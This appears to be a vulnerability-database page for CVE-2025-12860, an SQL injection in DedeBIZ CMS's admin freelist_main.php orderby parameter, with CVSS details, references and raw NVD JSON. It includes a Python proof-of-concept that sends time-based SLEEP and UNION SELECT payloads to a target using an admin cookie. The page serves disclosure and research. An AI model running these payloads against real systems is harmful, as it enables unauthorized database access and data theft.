CVE-2025-12860

Description

A vulnerability was found in DedeBIZ up to 6.3.2. Affected is an unknown function of the file /admin/freelist_main.php. The manipulation of the argument orderby results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:dedebiz:dedebiz:*:*:*:*:*:*:*:* - VULNERABLE

DedeBIZ CMS <= 6.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12860 DedeBIZ SQL Injection PoC
# Target: DedeBIZ CMS <= 6.3.2
# Endpoint: /admin/freelist_main.php
# Parameter: orderby

def exploit_sql_injection(target_url, cookie):
    """
    Exploit SQL injection in orderby parameter
    """
    headers = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0'
    }
    
    # Payload to extract database version
    # Using time-based blind SQL injection
    payload = "1 AND (SELECT 1 FROM (SELECT SLEEP(5))x)"
    
    # Original request with malicious orderby parameter
    params = {
        'orderby': payload
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Sending malicious request...")
    
    try:
        response = requests.get(
            f"{target_url}/admin/freelist_main.php",
            params=params,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        # Extract database version using UNION-based injection
        union_payload = "1 UNION SELECT 1,2,3,4,5,version(),7,8,9,10--"
        params['orderby'] = union_payload
        
        response = requests.get(
            f"{target_url}/admin/freelist_main.php",
            params=params,
            headers=headers,
            timeout=10
        )
        
        if '5.' in response.text or '8.' in response.text:
            print("[+] Database version extracted successfully!")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>")
        print(f"Example: python {sys.argv[0]} http://target.com 'admin_id=xxx'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_sql_injection(target, cookie)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12860
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12860
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12860/
[4] VulDB https://vuldb.com/cve/CVE-2025-12860
[5] https://github.com/ZZCTD/zz_test/issues/2
[6] https://vuldb.com/?ctiid.331507
[7] https://vuldb.com/?id.331507
[8] https://vuldb.com/?submit.679111
[9] https://github.com/ZZCTD/zz_test/issues/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12860", "sourceIdentifier": "[email protected]", "published": "2025-11-07T15:15:40.110", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in DedeBIZ up to 6.3.2. Affected is an unknown function of the file /admin/freelist_main.php. The manipulation of the argument orderby results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dedebiz:dedebiz:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.3.2", "matchCriteriaId": "082F0B28-FA6C-456C-A86E-DE727B70E5E1"}]}]}], "references": [{"url": "https://github.com/ZZCTD/zz_test/issues/2", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://vuldb.com/?ctiid.331507", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331507", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.679111", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/ZZCTD/zz_test/issues/2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Broken Link"]}]}}